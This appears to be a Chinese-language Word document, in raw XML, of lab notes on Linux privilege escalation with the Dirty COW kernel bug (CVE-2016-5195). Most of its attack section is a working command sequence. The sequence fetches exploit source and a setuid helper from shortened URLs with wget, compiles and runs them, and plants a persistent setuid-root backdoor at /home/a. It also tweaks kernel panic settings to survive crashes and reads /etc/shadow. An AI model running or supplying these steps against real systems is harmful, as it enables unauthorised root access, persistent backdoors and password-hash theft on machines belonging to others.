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C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRPr="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E67C9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>寻找:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>1.可写入的易受攻击的服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>2.错误配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>3.普通文件中的密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>4.计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>5.补丁问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C355D5" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E67C9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dirty COW (CVE-2016-5195)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="006B48C3">
        <w:t>Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>2007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>10.18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="00981124">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该漏洞是</w:t>
      </w:r>
      <w:r w:rsidRPr="00981124">
        <w:t xml:space="preserve"> Linux 内核的内存子系统在处理写时拷贝（Copy-on-Write）时存在条件竞争漏洞， 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后，利用此漏洞获取 其他只读内存映射的写权限，进一步获取 root 权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>Linux写时拷贝技术（copy-on-write）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Linux系统中，fork()会产生一个和父进程完全相同的子进程，但子进程在此后多会exec系统调用，出于效率考虑，Linux系统中引入了“写时复制”技术，也就是只有进程空间的各段的内容要发生变化时，才会将父进程的内容复制一份给子进程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRPr="00981124" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="006B48C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此漏洞允许攻击者通过内核漏洞从非特权用户转到</w:t>
      </w:r>
      <w:r w:rsidRPr="006B48C3">
        <w:t xml:space="preserve"> root 权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但有一个问题是它会导致一些内核崩溃，所以</w:t>
      </w:r>
      <w:r w:rsidRPr="006B48C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须确保在正确的</w:t>
      </w:r>
      <w:r w:rsidRPr="006B48C3">
        <w:t xml:space="preserve"> Linux 内核上使用正确的版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006B48C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核版本需要在</w:t>
      </w:r>
      <w:r w:rsidRPr="006B48C3">
        <w:t>2.6.22以上，并且未打补丁</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>Dirtycow payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="00AA763E">
        <w:t>https://gist.githubusercontent.com/scumjr/17d91f20f73157c722ba2aea702985d2/raw/a37178567ca7b816a5c6f891080770feca5c74d7/dirtycow-mem.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A3538CF" wp14:editId="06D12609">
            <wp:extent cx="5274310" cy="404495"/>
            <wp:effectExtent l="0" t="0" r="254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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20ACC9AA" wp14:editId="1FC1408C">
            <wp:extent cx="5274310" cy="1176020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53D600C4" wp14:editId="53E84B19">
            <wp:extent cx="5274310" cy="527685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡住(</w:t>
      </w:r>
      <w:r>
        <w:t>2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本已修复，利用失败</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1195ED81" wp14:editId="3FC52529">
            <wp:extent cx="3943350" cy="1524000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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若成功后:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭定期写回以使漏洞稳定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>echo 0 &gt; /proc/sys/vm/dirty_writeback_centisecs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="00B005CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许内核崩溃时重新启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>echo 0 &gt; /proc/sys/vm/dirty_writeback_centisecs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>echo 1 &gt; /proc/sys/kernel/panic &amp;&amp; echo 1 &gt; /proc/sys/kernel/panic_on_oops &amp;&amp; echo 1 &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>/proc/sys/kernel/panic_on_unrecovered_nmi &amp;&amp; echo 1 &gt; /proc/sys/kernel/panic_on_io_nmi &amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>echo 1 &gt; /proc/sys/kernel/panic_on_warn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看当前身份:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为r</w:t>
      </w:r>
      <w:r>
        <w:t>oot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>Try reading the shadow file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="00E8768F">
        <w:t>ubuntu-14.04.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="00700022">
        <w:t>http://old-releases.ubuntu.com/releases/14.04.1/ubuntu-14.04.1-desktop-amd64.iso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r w:rsidRPr="00B005CC">
        <w:t>https://github.com/dirtycow/dirtycow.github.io</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="092F71AF" wp14:editId="7C290D9A">
            <wp:extent cx="5274310" cy="379730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DFBD4A4" wp14:editId="51196F9E">
            <wp:extent cx="2522706" cy="1669249"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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608" cy="16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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test用户无s</w:t>
      </w:r>
      <w:r>
        <w:t>udo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57DBEAA5" wp14:editId="2AC5AB83">
            <wp:extent cx="5191125" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C5185D2" wp14:editId="5E87C332">
            <wp:extent cx="5274310" cy="277495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19584363" wp14:editId="6A1DE7DB">
            <wp:extent cx="5274310" cy="302895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1854B3EC" wp14:editId="048725C7">
            <wp:extent cx="5274310" cy="650875"/>
            <wp:effectExtent l="0" t="0" r="254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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC0E9E1" wp14:editId="36D94B7C">
            <wp:extent cx="5274310" cy="931545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905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>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test用户已提权(拥有s</w:t>
      </w:r>
      <w:r>
        <w:t>udo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限，成功切换到</w:t>
      </w:r>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4931995B" wp14:editId="0ED51293">
            <wp:extent cx="3782114" cy="1575881"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715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329" cy="16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Default="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较稳定的提权过程:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRPr="00276B23" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276B23">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>https://raw.githubusercontent.com/cheetz/dirtycow/master/THP-Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>#Download the dirtycow exploit and compile the binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>wget http://bit.ly/2dVlw4Z -O dirtycow-mem.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>./dirtycow-mem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>#Next we need to turn dirty_writeback_centisecs off to make the exploit more stable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>echo 0 &gt; /proc/sys/vm/dirty_writeback_centisecs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>#Before the exploit crashes, we are going to create a little binary that abuses the setuid and stickeybit to run and execute /bin/bash as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>cd /home/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>wget https://bit.ly/2IQEqZG -O a.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>gcc -o a a.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>chown root a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>chmod +s a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>ls -alh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>#Set Kernel panic to reboot versus freeze the system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>echo 1 &gt; /proc/sys/kernel/panic &amp;&amp; echo 1 &gt; /proc/sys/kernel/panic_on_oops&amp;&amp; echo 1 &gt; /proc/sys/kernel/panic_on_unrecovered_nmi &amp;&amp; echo 1 &gt; /proc/sys/kernel/panic_on_io_nmi &amp;&amp; echo 1 &gt; /proc/sys/kernel/panic_on_warn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">#Exit to save the binary </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>#Use our privesc binary to go from a limited uesr to root and reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>/home/a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>reboot -f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9"/>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>#Now anytime you want to go back to root, run the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:t>/home/a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003619A2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ubuntu-14.04.1</w:t>
      </w:r>
      <w:r w:rsidRPr="003619A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>下运行内核崩溃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>卡死</w:t>
      </w:r>
      <w:r w:rsidRPr="003619A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRPr="003619A2" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003619A2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>https://gist.githubusercontent.com/scumjr/17d91f20f73157c722ba2aea702985d2/raw/a37178567ca7b816a5c6f891080770feca5c74d7/dirtycow-mem.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F365511" wp14:editId="026A217B">
            <wp:extent cx="5274310" cy="2003425"/>
            <wp:effectExtent l="0" t="0" r="254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9" w:rsidRPr="004E67C9" w:rsidRDefault="004E67C9" w:rsidP="004E67C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="004E67C9" w:rsidRPr="004E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1E2" w:rsidRDefault="009271E2" w:rsidP="004E67C9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009271E2" w:rsidRDefault="009271E2" w:rsidP="004E6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1E2" w:rsidRDefault="009271E2" w:rsidP="004E67C9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009271E2" w:rsidRDefault="009271E2" w:rsidP="004E6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2D"/>
    <w:rsid w:val="004E67C9"/>
    <w:rsid w:val="009271E2"/>
    <w:rsid w:val="00C355D5"/>
    <w:rsid w:val="00D6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94792"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4346953A-CF40-4734-8BCD-D52B655E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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-06T10:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-06T10:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>